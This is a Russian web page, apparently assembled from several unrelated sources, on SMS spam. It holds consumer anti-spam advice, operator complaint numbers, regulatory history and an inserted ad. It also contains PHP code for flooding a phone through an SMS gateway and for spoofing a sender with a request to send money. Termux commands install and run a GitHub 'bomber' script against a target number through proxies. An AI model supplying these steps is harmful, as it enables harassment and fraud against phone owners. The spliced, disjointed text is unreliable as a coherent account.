SMS Bomber — Программа для спама сообщениями на телефон

Содержание

Как свести риск штрафа за рассылки к минимуму

Специалисты Травелата после консультаций с юристами составили список, что нужно предпринять, чтобы минимизировать риск получения штрафа за спам по решению ФАС. Вот их рекомендации:

  1. Подготовьте однозначное доказательство того, что клиент давал согласие на подписку. Для этого используйте опцию double opt-in. Потребитель дважды подтверждает согласие на рассылку email: когда подписывается и когда отвечает на письмо-подтверждение.
  2. Не используйте форму с уже отмеченной «галочкой», которая подтверждает подписку.
  3. Сохраняйте историю действий подписчиков и переписку с ними.
  4. Добавьте на сайт и в рассылку пользовательское соглашение. При этом включите в него пункт, в котором предупреждаете, что можете использовать адреса клиентов для рассылки.
  5. Включите в общий договор с пользователем пункты об обработке персональных данных и об информировании клиента по электронной почте, телефону и SMS.
  6. Ведите единый стоп-лист адресов и телефонов подписчиков, отписывавшихся от рассылки.
  7. Убедитесь, что обращения клиентов с просьбой отписать их от рассылок выполняются своевременно. Не рассылайте больше рекламных рассылок тем, кто попросил их отписать, даже если они снова делают покупку или заказ.

Как сообщить о рассылке спама

Корпорации, предоставляющие услуги  связи, так же заинтересованы в ликвидации спам информирования, как и вы. Ведь  каждодневные обращения с просьбами отключить рассылку тратят время сотрудников, а соответственно деньги компании.

Сегодня у каждой телекоммуникационной компании есть специальные номера, на которые вы можете сообщить о СМС спаме:

  • Для абонентов МТС есть 2 способа сообщить о нежелательных СМС – при помощи звонка на бесплатный номер  0890, или обратившись по адресу  911@mts.ru;
  • Для абонентов Билайн и Теле 2 — бесплатный звонок на  номер 0611;
  • Для абонентов Мегафон – бесплатный звонок на номер 0500 или оформить жалобу на официальном сайте http://megafon.ru/bezopasnoe_obschenie/.

Если у вас другой мобильный оператор, то вы можете уточнить номер на который можно сообщить  о поступающих нежелательных СМС обратившись в их сервисную службу.

Так же вы можете написать  обращение в Роскомнадзор  на их сайте по этой ссылке https://rkn.gov.ru/treatments/ask-question. Жалоба будет разобрана и будут предприняты все возможные меры.

Обращаясь с просьбой об отключении рассылки важно помнить, что обращаться нужно не к своему  оператору, а  к оператору связи с номера которого осуществляется рассылка спам сообщений

Как избавиться от СМС-спама

На сегодняшний день имеется не один способ прекратить прием смс-спама. Имеются как законные, так и не очень честные, при помощи специальных приложений и через официальный запрос. Всё зависит от того на сколько Вас достали спамеры и как срочно Вы хотите избавиться от смс-рассылки. Хорошо если подписку можно убрать самостоятельно, однако это не всегда возможно. Именно для таких случаев мы и собрали перечень способов, а именно:

  1. Если Вам смс рассылка приходит от конкретного сайта, то зайдите в личный кабинет или под своим аккаунтом и найдите поле «отказаться от смс рассылки». Данный пункт обязан быть, так что внимательно поищите его в настройках.
  2. Можно обратиться к Вашему мобильному оператору связи, у каждого из них имеются отдельные номера и почтовые адресы для обработки претензий по поводу спама.
    • Билайн — тел. 0611 (отключение рекламных рассылок);
    • Мегафон — тел. 0500 или через сайт www.stopfraud.megafon.ru/feedback/
    • МТС—через сайт www.mts.ru/feedback или по электронной почте 911@mts.ru ;
    • TELE2 — тел. 611 или через сайт http://spb.tele2.ru/services/udobnoe-obshenie/antispam/
  3. Еще один способ, это пожаловаться на смс спам в Федеральную антимонопольную службу (ФАС). Данный способ эффективен сразу по двум причинам, рассылка прекращается, нарушителя наказывают. Заявление составить не трудно, однако процесс не быстрый. Прочитайте в интернете что конкретно нужно указывать при заполнении. Жалобу можно отправить по адресу delo@fas.gov.ru
  4. Установка специального приложения. Последний способ наверное самый эффективный и быстрый. Сегодня в PlayMarket существует множество программ, которые способны защищать Ваш телефон и не пропускать нежелательный спам по смс. Введите в поиск Black List и выбирайте подходящее приложение для Вашего Android. А вот Владельцам iPhone в этом случае не повезло. В AppStore такого рода приложений нет. Однако выход есть. Заведите в телефонной книге контакт «Спас» и отключите для него уведомления. Далее заносите в него все те номера, от которых смс спам приходит.

Теперь каждый раз, перед тем как внести свой номер в анкету, или указать при заполнении, регистрации дважды подумайте о последствиях. Внимательно читайте то, с чем Вы соглашаетесь, этот текст не просто так пишется, там имеются нюансы, которые в дальнейшем могут выступать не в вашу пользу.

2012

МТС запускает систему «Антиспам»

В 2012 году МТС запустила автоматизированную систему «Антиспам», которая выявляет и блокирует мошеннические SMS-рассылки, разработала услугу «Черный список» для самостоятельной блокировки SMS-сообщений и звонков с любых номеров и открыла короткий номер 1911 для пересылки жалоб абонентов на спам и мошенничество.

ФАС разъясняет, как бороться с непрошенной SMS-рассылкой

В связи с многочисленными обращениями абонентов Санкт-Петербургское управление Федеральной антимонопольной службы в декабре 2012 года разъяснило порядок подачи жалоб на операторов связи за несанкционированную SMS-рекламу.

Для решения этого вопроса Санкт-Петербургское УФАС рекомендует до обращения в антимонопольную службу направить своему оператору мобильной связи письменный отказ по почте с уведомлением о вручении. Письмо, отправленное по электронной почте не является доказательством его получения надлежащим лицом. Другой, более надежный вариант — составить письменный отказ в двух экземплярах на имя руководителя компании, первый экземпляр необходимо передать лично представителю в офисе компании, а на своем экземпляре поставить входящий номер или подпись должностного лица.

В случае отсутствия ответа в установленный срок и продолжения поступления рекламы, следует обращаться с заявлением в УФАС. К заявлению необходимо приложить копию обращения к оператору мобильной связи, фотографии рекламных сообщений с экрана мобильного телефона, распечатку сообщений, полученную от оператора связи и копию договора с оператором на оказание услуг мобильной связи.

Отказ от получения рекламы предусмотрен «Условиями оказания услуг связи», размещенными каждым оператором в качестве публичной оферты на официальных сайтах. Абонент соглашается на весь срок действия договора об оказании услуг связи, подписанного сторонами, на получение рекламы при использовании услуг связи, но при этом он вправе в любое время отказаться от рекламы.

Совещание в Роскомнадзоре по вопросу блокировки SMS-спама

В Роскомнадзоре состоялось в феврале 2012 года совещание по вопросам принятия операторами мобильной связи дополнительных мер, направленных на снижение количества жалоб абонентов на услуги контент-провайдеров. В совещании приняли участие представители Роскомнадзора, Роспотребнадзора, МВД, операторов мобильной связи «МТС», «МегаФон» и «ВымпелКом».

По данным Роскомнадзора, доля жалоб на услуги контент-провайдеров, оказываемых, в том числе посредством коротких номеров, составляет примерно 30% от общего количества жалоб по вопросам мобильной связи. Граждане жалуются преимущественно на оказание дополнительных услуг без их согласия, без предупреждения о размере платы, а также на списание денежных средств за непредоставленные услуги.

Участники совещания признали, что необходима существенная корректировка нормативной правовой базы, так как данная проблема нерешаема силами только операторов сотовой связи. В Роскомнадзоре считают, что часть вопросов будет решена после утверждения новой редакции Правил оказания услуг подвижной связи, которая находится в завершающей стадии согласования, однако для окончательного решения проблемы этого будет недостаточно.

Представители же управления «К» МВД России полагают, что эффективной мерой в борьбе с SMS-спамерами может стать ужесточение наказания за такие преступления и перевод его из разряда административного в уголовные со сроком тюремного заключения до пяти лет и более.

Spam Agent

Принцип работы

Зайдя в приложение, открыть папку «Inbox» («Входящие»), выбрать сообщение со спамом и пометить его как нежелательное. Весь SMS-спам будет покоиться в специально отведенной папке приложения. Ваш Spam Agent изучает те номера и сервисы, которые нужно блокировать, самообучается и не пропускает вредные сообщения. Сами разработчики пишут, что программа использует «методы машинного обучения» для блокировки SMS.

Пакет «MUSTHAVE-2020» для digital-агентств и веб-студий

Главный коммерческий пакет MUSTHAVE-2020 для digital-агентств и веб-студий, в который включено сразу 7 различных опций, сервисов и рекламных форматов в рейтингах Руварда на весь следующий год.

Успейте приобрести MUSTHAVE до Нового Года! Cossa рекомендует.

Преимущества

1. Не нужно самостоятельно составлять длинные черные списки, достаточно только пометить SMS-сообщение как спам.

2. Нет никакой рекламы в самом приложении.

3. Простой интерфейс и принцип работы.

Недостатки

1. Неотключаемое звуковое оповещение о том, что пришел спам.

2. Возникают проблемы использования программы на некоторых моделях телефонов

(например, Samsung Galaxy Note).

Как происходит реализация атаки смс спама

Очевидно, что смс-спам это не рассылка смс-сообщений с мобильных устройств, так как для этого нужно значительные ресурсы. Такой метод атаки стал доступен из-за плохой защищенности СМС-шлюзов. СМС-шлюз — это сервисная служба, которая реализует передачу и отправку смс-сообщения без мобильного телефона. Такой сервис является сервером, который настроен на передающей и принимающей GSM — станции. Такой сервер может не только работать с разными протоколами в глобальной сети, но и транспортировать СМС-сообщения с мобильных устройств. Схематично принцип работы СМС-шлюза показан на рис.1.

Рисунок 1

Такие смс-шлюзы разрешают отправлять бесплатные смс-сообщения с онлайн сервисов Интернета. Для злоумышленника не составляет труда зарегистрироваться в таких онлайн сервисах, пополнить баланс и отправлять сообщения. Или можно создать свой скрипт который будет отправлять очень много сообщений. Пример кода:

  • $user =»user»;
  • $password =»password»;
  • $api_id =»xxx»;
  • $text =urlencode(«SMS spam»);
  • $to =»79035555555″;
  • $ret =file(«http://smscenter.com/auth?user=$user&password=$password&api_id=$api_id»);
  • if($ret ==»OK»){
  • for($i = 0; $i
  • {
  • $ret =file(«http://smscenter.com/sendmsg?to=$to&text=$text»);
  • if($ret == «OK») echo «message was sent»;
  • else echo «message failed»;
  • }
  • }
  • else{
  • echo «authentification fail»;exit();
  • }
  • ?>

Пример наведен на языке PHP, который посылает 100 сообщений с помощью СМС-шлюза.

Правила составления документа

Стандартная форма жалобы на спам содержит:

  1. «Шапку», расположенную в верхней правой части документа. Здесь указывается наименование организации, ФИО ответственного лица, адрес организации, данные заявителя: ФИО, адрес, телефон, e-mail.
  2. По центру пишется слово «Жалоба» (претензия), далее излагается суть проблемы с доказательствами: фото дисплея телефона с текстом сообщения; распечатка скриншота страницы электронной почты; аудиозапись телефонного разговора; выписка оператора, предоставляющего услуги обильной связи для подтверждения входящего звонка или SMS; копия договора об оказании услуг связи (обычно в нем содержится пункт о согласии на получение сообщений рекламного характера).
  3. В конце ставится подпись и дата подачи документа.

Важно, чтобы обращение было составлено грамотно, не содержало эмоциональной окраски и нецензурных выражений, касалось только сути проблемы и было адресовано органам, компетентным в решении данного вопроса.

Подделка имя отправителя смс-сообщения

Присланное сообщение может быть отправлено не с того номера который указывается в номере отправителя. Интересная вещь, которую можно использовать как использовать номер вашего знакомого в такой роли. При этом текст может быть в виде просьбы, или же других действий которых нужно что бы пользователь сделал.

Следующий код примерно показывает логику такой атаки:

  • $user =»user»;
  • $password =»password»;
  • $api_id =»xxx»;
  • $text =urlencode(«SMS spamпереведи мне деньги на телефон 7902624737»);
  • $to =»79035555555″;
  • $from =»7906666666″;
  • $ret =file(«http://smscenter.com/auth?user=$user&password=$password&api_id=$api_id»);
  • if($ret ==»OK»){
  • for($i = 0; $i
  • {
  • $ret =file(«http://smscenter.com/sendmsg?session_id=$sess_id&to=$to&text=$text&from=$from»);
  • if($ret == «OK») echo «message was sent»;
  • else echo «message failed»;
  • }
  • }
  • ?>

Заметить такую атаку сложно, если злоумышленник изучил ваше окружение или же другие характеристики. Для минимизации риска нужно быть бдительным, и не спешить совершать то, что написано в смс-сообщении. Первым и верным способом, это перезвонить на этот номер и спросить действительно ли ему нужны деньги и зачем. Если абонент вне зоны доступа, скорее всего злоумышленник вывел из строя мобильный телефон того, кому бы вы позвонили.

На МТС

У МТС есть услуга Антиспам, и она бесплатная. Для того чтобы ей воспользоваться, сделайте следующее:

  1. Перешлите рекламное SMS без изменений на номер 6333. В ответ вы получите SMS от номера 6333 с запросом имени или номера отправителя рекламного SMS.
  2. Отправьте SMS с именем или номером отправителя на номер 6333 в течение 10 минут после получения соответствующего запроса.

После этого сообщения от данного спамера будут заблокированы для вас на уровне оператора.

Кстати говоря, сам МТС тоже любит баловаться рекламными рассылками. Чтобы заблокировать смс-рассылку МТС, включите услугу Запрет контента: наберите код *111*374# и далее нажмите кнопку Вызов.

Как ФАС вынесла решение о штрафе за email-рассылку

В 2016 году один из подписчиков Травелаты написал заявление в УФАС по Удмуртской республике о том, что ему на почту приходят письма без его предварительного согласия, что является нарушением части 1 статьи 18 федерального закона «О рекламе».

Заметим, что Travelata не делала спам-рассылок и предоставляла подписчикам много возможностей для отписки:

  • Отправляла приветственное письмо с возможностью отписаться от рассылок (ей пользовались 3% подписчиков).
  • Включала ссылку «отписаться» в футер каждого письма.
  • Отписывала подписчиков вручную после их писем или телефонных звонков в поддержку.

С чем была связана претензия

В Travelata начали спешно выяснять, как такое могло случиться, и обнаружили следующее:

  • Этот подписчик покупал туры пять раз (!) и получал рассылку, так как не снимал предустановленной «галочки» в форме заказа.
  • Один раз этот подписчик отписался от рассылки сам, в другой раз написал менеджеру — оба раза его отписали от рассылок.
  • Затем он опять покупал тур, не снимая галочку, и оказывался подписанным заново.

Несмотря на скриншоты и логи, которые предоставила Травелата, ФАС постановила, что компания отправляла письма без согласия получателя.

Комментарий юриста: «галочка» ничего не доказывает

Специалисты юридической компании «Приоритет» отмечают, что единственно верным доказательством того, что человек согласен получать ту или иную информацию, служит его физическая или электронная подпись. Поэтому ФАС не рассматривает как достаточное доказательство галочку, которую покупатель ставит под предложением о подписке.

Bomber VS Креативное хулиганство

Когда-то мой знакомый работал в одной конторе, директор которой был очень сложным человеком и имел кучу врагов, и он на практике убедился, что атака на телефоны компаний может происходить и более креативным образом чем банальные скрипты. Расскажу эту историю, что бы было понятно о чем идет речь.

Дело в том, что какие-то конкуренты, каждый день распространяли через паблики и бесплатные доски объявлений, а также некоторые специфические форумы и сайты типа «Отдам даром», «Помощь и благотворительность», «Барахолка», «Продажа телефонов и тд.» сообщения которые имели определенную логику.

Разумеется номера в этих объявлениях, заботливые конкуренты указывали не свои, соответственно работа отдела продаж хаотично останавливалась, менеджеры постоянно отвечали, что никакие кроссовки и айфоны за пол цены никто не продаёт. Продолжалось это несколько месяцев, потом директор или договорился или как-то иначе решил этот вопрос.

Суть заключается в том, что от такой спам-атаки защититься ещё сложнее по скольку простые блокировки по номерам\ip\патернам набора\сообщений не работают эффективно, ведь звонить могут откуда угодно и спрашивать что угодно, причем это будут люди которые и не подозревают что происходит на самом деле и что своими звонками они мешают работе других людей.

Как отписаться от смс-спама

1. Если вы сами подписались на рассылку, то у вас должна быть возможность добровольно от нее отписаться. Любая приличная компания дает клиенту такую возможность, и действительно прекратит рассылку, если вы от нее откажетесь. Условия отказа должны уточняться компанией, как дополнительная информация в полученных вами смс-ках, или на сайте. Например: «Для отказа от подписки на нежелательную услугу, отправьте бесплатное SMS с цифрой «1» на этот номер».

Главное — никогда не шлите ответных смс-ок! Это может оказаться уловкой мошенников, и вы не досчитаетесь значительной суммы на счете!

2. Если отписаться не получается, или вы получаете рассылки, на которые не подписывались, внимательно изучите функции вашего телефона. Многие модели предлагают возможность занесения номера в «черный список». Если же раздражают информационные сообщения самого оператора, то и их можно отключить через меню телефона.

Также можно использовать услуги вашего оператора мобильной связи для занесения номера отправителя в «черный список». Как правило, это можно сделать бесплатно. У операторов есть специальные телефонные номера и электронная почта для таких претензий:

  • МТС: 911@mts.ru или переправьте полученное SMS на бесплатный номер 1911 – сервис жалоб МТС;
  • МЕГАФОН: www.stopfraud.megafon.ru/feedback/ или по номеру 0500;
  • БИЛАЙН: *110*20#ВЫЗОВ — отключение услуги «Хамелеон» (рекламных рассылок) или по телефону 0611.

Вы можете обратиться с жалобой не только к своему оператору, но и к оператору, обслуживающему телефон, с которого отправляется спам. На сайте www.mtt.ru/mtt/def по номеру телефона можно узнать название оператора телефона, с которого вам пишут.

3. Спам по bluetooth принимать в любом случае не нужно. А чтобы эти сообщения вам не мешали, проще всего включать bluetooth, только тогда, когда он вам непосредственно нужен — например, для перекачки файлов. Заодно и аккумулятор меньше разряжаться будет. Еще один вариант — отключить функцию обнаружения вашего bluetooth другими устройствами.

СМС-спам и его виды

Само по себе данное хулиганство имеет даже несколько видов, и в некоторых случаях оно даже считается законным, а именно в том случае, когда Вы сами подписались на смс рассылку. Кстати в Российской Федерации с 1 мая 2014 года вступил в силу закон, про SMS мошенничество, который запрещает рассылать Вам уведомления об акциях, конкурсах, смс сообщения развлекательного типа и другие без Вашего согласия. Конкретно смс спасом считается регулярная рассылка сообщений с рекламным текстом. Ниже мы рассмотрим три вида такого рода рассылки для того, чтобы разбираться в них и понимать с чем Вам предстоит бороться.

Виды смс-спама

Теперь, когда Вы знаете все три вида спама, можно смело определить Ваш тип. Зная свой тип смс-рассылки, можно рассматривать способы борьбы с ним. Сайт elgreloo.com подготовил для Вас разные способы борьбы с тем или иным спамом через смс сообщения. Определяйте более подходящий или действенный способ и приступайте к борьбе.

2013

76% пользователей страдают от мобильного спама

ПО неофициальным данным 90-95% всего SMS-спама идет через региональных операторов. Они держат рынок, благодаря низким ценам и возможности отправлять так называемый белый спам без согласия абонентов. Некоторые телекоммуникационные компании готовы предложить стоимость в 2,5 коп. за одно сообщение (в зависимости от количества трафика), в то время как средняя стоимость таких каналов составляет 3-5 коп. Непрямое подключение позволяет региональным операторам уберечь своих заказчиков от баснословного штрафа, даже в случае если заказчик не сможет предоставить или доказать согласие абонента на отправку ему SMS-сообщений. Впрочем, это вовсе не означает, что мошеннические рассылки, запущенные по непрямым каналам, останутся безнаказанными, за них также будет штраф.

МТС меняет формат работы с распространителями SMS

Со 2 декабря 2013 года МТС перешла на новый формат работы с распространителями информационно-рекламных SMS — рассылка таких сообщений, входящих в сеть МТС с коротких и буквенно-символьных номеров, была переведена на прямые договора, в рамках которых оператор получил возможность проверять согласие абонента на получение рекламы.

Tele2 ужесточает работу с распространителями SMS

С ноября 2013 года Tele2 начала блокировать несанкционированные рассылки с буквенно-цифровых имен отправителей, владельцы которых не заключили договор с оператором или SMS-агрегатором, являющимся партнером Tele2. Эта мера помогла обеспечить качественную фильтрацию сообщений и максимальную защиту абонентов от спама. Кроме того, оператор предлагает клиентам услугу «Черный список», которая позволяет пользователям самостоятельно оградить себя от назойливых звонков и SMS. Абонент может вносить в список не только нежелательные короткие номера, текстовые подписи отправителей, но и DEF-номера отдельных абонентов.

«Мегафон» первым вводит требования к SMS-рассылкам

В 2013 году «МегаФон» первым из операторов «Большой Тройки» принял решение ввести регламенты и требования к СМС-рассылкам абонентам. Понимая, что есть СМС-сообщения от банков и других финансовых организаций, которые по закону обязаны информировать клиентов о совершенных операциях и передавать дополнительные коды подтверждения транзакций, оператор реализовал специальное решение для банков, позволяющее эффективно выделить поток подобных сообщений в отдельный блок.

Отдельное внимание было уделено блокировке нежелательного трафика. Была внедрена автоматизированная система сбора и анализа претензий на спам

Благодаря этой системе в частности нам удалось оградить наших абонентов от значительного числа нежелательных сообщений.

В общем потоке нежелательных для абонентов рассылок были не только рекламные рассылки, но и различные мошеннические сообщения, в т.ч. со ссылками на вредоносное ПО, загрузка которого приводила к потере денег и с мобильного, и с банковского счета.

В среднем в день на «горячую линию» (бесплатный номер «1911») и через другие каналы коммуникации поступает около 2,5 тысяч жалоб от абонентов на спам-рассылки.

Практика показала, что спамеры постоянно стремятся обойти ограничения со стороны операторов и ищут новые варианты рассылки нежелательных для абонента СМС, такие, например, как отправка сообщений с подстановкой обычных абонентских номеров (DEF-номера) или использование СМС-центров африканских стран. По статистике в настоящее время более 90% жалоб наших клиентов на спам приходится на рассылки с абонентских номеров других операторов. Поэтому компания, стремясь обеспечить реальную защиту своих клиентов, также постоянно совершенствует механизмы защиты от спама.

На iPhone

В iOS есть два способа основных способа заблокировать сообщения с нежелательных номеров: через Сообщения или через настройки приложений.

  1. Откройте приложение Сообщения и перейдите в диалог со спамером. Нажмите на букву i в правой верхней части экрана (в более старых версиях iOS там надпись Подробно). На экране Подробно нажмите на стрелку рядом с именем контакта и затем выберите Заблокировать абонента > Заблокировать контакт.

2. Откройте Настройки > Сообщения. Выберите Заблокированные и нажмите Добавить новый. Введите номер, который хотите заблокировать, и нажмите Заблокировать контакт. 

Кроме них, доступны три опциональных способа: блокировка SMS от всех номеров не из списка контактов, блокировка при помощи сторонних фильтров и скрытие уведомлений.

1. В настройках приложения Сообщения выберите пункт Неизвестные и спам. Передвиньте вправо ползунок Фильтрация по отправителю. Тогда все сообщения с номеров не в вашем списке контактов будут попадать в списке сообщений в отдельную вкладку, и о них не будут выводиться уведомления.

2. Установите одно из сторонних приложений, которые содержат базы спам-номеров и позволяют фильтровать сообщения от них. Вот некоторые из них в AppStore:

На том же экране Неизвестные и спам нужно ползунком включить установленный фильтр вместо стандартной фильтрации iMessages. Тогда в отдельную вкладку в списке сообщений будут попадать только спамеры (а не, к примеру, ваши друзья, пишущие с новых номеров).

3. Наконец, реклама может приходить не только от контактов, которые вы бы с удовольствием внесли в черный список, но и от полезных — к примеру, Сбербанк очень любит доставать разными акциями по номеру 900. В этом случае просто сделайте свайп вправо по диалогу с номером 900 и выберите Скрыть оповещения. Сбербанк по-прежнему сможет присылать вам SMS, но вы будете читать их только тогда, когда захотите.

Альтернатива SMS Bomber на Android или Linux

Наш эксперимент выше показал, что несмотря на то, что за последние годы каналы доставки отвалились и работает только 1 из 8 (возможно потому, что разработчик не поддерживает более софт), бесплатный бомбер для Windows все ещё работает. Он неудобный, не имеет встроенных настроек прокси, текста сообщения, опытные спамеры его явно не используют. Сегодня это больше игрушка и баловство.

Cовременные спамеры и прочие нарушители рекламного спокойствия используют приватные скрипты, как правило они пишутся под планшеты или телефоны под управлением Android, иногда используют также ПК с Linux. Разберем один из похожих вариантов, публично доступных на гитхабе.

Шаг 1. Устанавливается эмулятор Termux.

Для стабильной работы Android должен быть версии выше 4.4 Для Linux понятное дело всё проще, там дальнейшие действия делаются из консоли.

Шаг 2. Покупаются или берутся бесплатные прокси.

Бесплатные будут быстро отваливаться, впрочем покупные тоже через некоторое время улетят в бан, у большинства селеров продающих приватные прокси есть свои системы контроля трафика, при первой подозрительной активности, админы блокируют доступ, но профессиональные злоумышленники просто поднимут свой пул адресов для этих целей.

Шаг 3. Настройка и установка необходимых пакетов.

В командной строке Termux вводятся команды для добавления пакетов и клонирования репозитория с скриптом Spammer-Grab.

Каждая команда отдельно с новой строки:

Clearpkg updatepkg install gitpkg install pythonpkg install python2pip2 install requestsgit clone https://github.com/p4kl0nc4t/Spammer-Grablschmod +x Spammer-Grablscd Spammer-Grablschmod 777 spammer.py

На вопросы «Do you want to continue?» отвечаем Y, через некоторое время все необходимые скрипты и пакеты будут установлены, заданы права и тд.

Шаг 4. Запуск скрипта.

Для запуска этого Android бомбера необходимо выполнить команду в таком формате:

python2 spammer.py —delay x —proxy http://xxx.xx.xx.xx/ 79xxxxxxxxx

Где —delay x — задержка в секундах, —proxy — ваш прокси, далее пробел и номер телефона без +

Если все сделано верно, скрипт начнет работу. Что бы завершить скрипт и отключить спамер, можно просто выйти из приложения.

Что бы снова включить, открываем Termux и вводим:

cd Spammer-Grab

и далее опять

python2 spammer.py —delay x —proxy http://xxx.xx.xx.xx/(ваш прокси) 79xxxxxxxxx(ваш номер)

Для работы в несколько потоков одновременно, в терминале свайп в право и New session, далее всё теже 2 команды выше.

Протестированные нами 4 номера имели примерно одинаковую динамику, даже с минимальной задержкой, а многопоточность и простая работа с терминалом и прокси, а значит и простая возможность автоматизации, через отдельный консольный скрипт, например по таймеру, делают этот способ более эффективным.

Однако если кто то сейчас думает, что это всё нужно запретить и выпилить все ссылки, то да мы тоже не любим спам, но помним про эффект Стрейзанд. Но это не главное. Главное, что есть и еще более забавный способ который практически не требует расходов на прокси и навыков автоматизации. И запретить его не возможно…

СМС-рассылка была такого содержания:

  1. Подпись отправителя: «teoremsport»
  2. Текст: «Занимайся выгодно,карта на 100 посещений 7500р 84959759525 89684218737»

Судя по контактным данным, авторство рассылки принадлежит фитнес клубу «Теорема Спорта».

Занятности ситуации добавляет тот факт, что СМС-сообщение пришло на телефон, который используется исключительно для отправки тестовых СМС-сообщений в целях проверки факта и времени доставки, а также корректности буквенной подписи отправителя и отправленного текста. То есть совершенно точно указанная СМС-рассылки была проведена без наличия какого бы то ни было согласия на ее получение (пополнение баланса не осуществляется через терминалы приема платежей).

Описанный случай как нельзя более точно характеризует, что такде СМС-спам: это именно такая рассылка, которая соверщена без предварительного разрешения получателя. Такая рассылка может повлечь санкции как оператора связи, так и от ФАС.

Откуда у спамеров мой номер

Мы каждый день используем номер своего мобильного телефона, но если вам приходит сообщение из организации которую вы не посещали, да ещё и и с вежливым обращением по имени, это означает лишь одно. Спамер приобрёл базу клиентских номеров. Более того, можно заказать спам рассылку через интернет.  К несчастью это совершенно не сложно, да и вовсе незаконно, а концы найти очень сложно.

К примеру, оформляя дисконтную карту, в каком либо магазине  вы оставляете свои данные и номер мобильного телефона. Суть соглашения состоит в том, что вы даёте своё согласие на обработку персональных данных. Вам начинает приходить информационная рассылка от магазина, со всевозможными предложениями и приглашениями на мероприятия. Магазин может принадлежать к группе компаний, таким образом, ваш номер оказывается у разных предприятий.

SMS Bomber жив

Судя по статистике поисковых запросов,  смс  бомбер продолжает пользоваться популярностью. Но позволит ли он достичь цели спамерам?

Начав поиски работающего дистрибутива, я проверил около 40 доступных публично источников, версии были самыми разными от 2 до 5. В ~70% при проверке на virustotal выдавали вшитые трояны и прочую нечисть.

Далее мы попробовали отправить смс на несколько своих контрольных номеров у 4 операторов — Мегафон, МТС, Билайн и Теле2. Результаты печалят.

В результате из 8 способов отправки у всех четырех номеров работал только 1 способ. Теле2 и Билайн сразу же срезали подозрительный трафик и поток сообщений остановился через 1,5 минуты.

У Мегафона и МТС это произошло немного позже. Прокси на каждый номер был свой. Настроить прокси через интерфейс самого бомбера невозможно, пришлось настраивать через командную строку. В целом если настроить работу для нескольких одновременно открытых окон и подобрать интервал этот софт по прежнему способен доставлять смс, однако ему далеко до платных аналогов и даже до скрипта о котором пойдет речь далее.

Вывод

СМС-рассылки, отправленные абонентам, не дававшим своего согласия на их получение, вряд ли коммерчески интересны и выгодны отправителю: ведь помимо возможных санкций за СМС-спам, отправитель может получить большое количество нелояльных потребителей, которые вряд ли выберут предложенный продукт. Наша компания категорически не приемлет подобного рода рассылки, отдавая предпочтение только тем клиентам и партнерам, которые проводят СМС-рассылки в полном соответствии с действующим законодательством.

Update 26.06.2017: пришло еще одно сообщение с текстом «ТОЛЬКО 28,29,30 ИЮНЯ! МЕГА РАСПРОДАЖА+СУПЕР ПОДАРКИ! ЗВОНИ 84959759525» (подпись отправителя teoremsport).

Update 26.07.2017: пришло еще одно сообщение с текстом «День открытых дверей!Дарим ДЕНЬГИ! С 28по31июля!Ждем Вас! 84959759525» (подпись отправителя teoremsport).

Update 16.08.2017: пришло еще одно сообщение с текстом «17.08 ДЕНЬ ФРУКТОВ,-50% на карту и подарки на выбор. 84959759525»

Update 29.08.2017: пришло еще одно сообщение с текстом «Напоминаем!Бронь карты активна до31.08.с1.09 повышение цен 84959759525»

Update 30.08.2017: пришло еще одно сообщение с текстом «СУПЕР НИЗКАЯ ЦЕНА! И ОГРОМНЫЕ ПОДАРКИ! БРОНЬ КАРТЫ ДО31.08 84959759525»

Update 08.09.2017: пришло еще одно сообщение с текстом «ПРОДЛЕВАЕМ ЛЕТО! ЛУЧШИЕ ЦЕНЫ И ПРИЯТНЫЕ ПОДАРКИ ЖДУТ ВАС! 84959759525»

Update 18.09.2017: пришло еще одно сообщение с текстом «Ты ждал лушее фитнес предложение? 14М-11000р! ТОЛЬКО 2 ДНЯ! 84959759525»

Update 26.09.2017: пришло еще одно сообщение с текстом: «Выбил СТРАЙК!? ПОЛУЧИ 12 МЕСЯЦЕВ ФИТНЕСА ЗА 8900Р. ЗВОНИ! 84959759525»

Update 10.10.2017: пришло еще одно сообщение с текстом: «Осенний МАРАФОН! 14мес+8 СУПЕР ПОДАРКОВ!Только 3 дня»бронь 89684218737»

Update 23.10.2017: пришло еще одно сообщение с текстом: «ОСЕННИЙ ЦЕНОПАД! VIP КАРТЫ НА СУПЕР УСЛОВИЯХ! ТОЛЬКО 2 ДНЯ! 84958759525»

Update 30.10.2017: пришло еще одно сообщение с текстом: «Только 2 дня! АДСКИЕ СКИДКИ НА ВСЁ ДО 50%! ЖУТКО ВЫГОДНО! 84959759525»

Update 07.11.2017: пришло еще одно сообщение с текстом: «ФИТНЕС за 79 руб! ЭТО РЕАЛЬНО! Целый год! В любое время! 84959759525»

Update 13.11.2017: пришло еще одно сообщение с текстом: «ЛОВИ МОМЕНТ! Лёгкий ФИТНЕС СТАРТ на СУПЕР условиях! 2дня 84959759525»

Update 17.11.2017: пришло еще одно сообщение с текстом: «ЧЕРНАЯ ПЯТНИЦА! 6 мес покупаешь, скидку в 50% получаешь! 84959759525»

Тестовые сообщения бесплатно

Ссылка на основную публикацию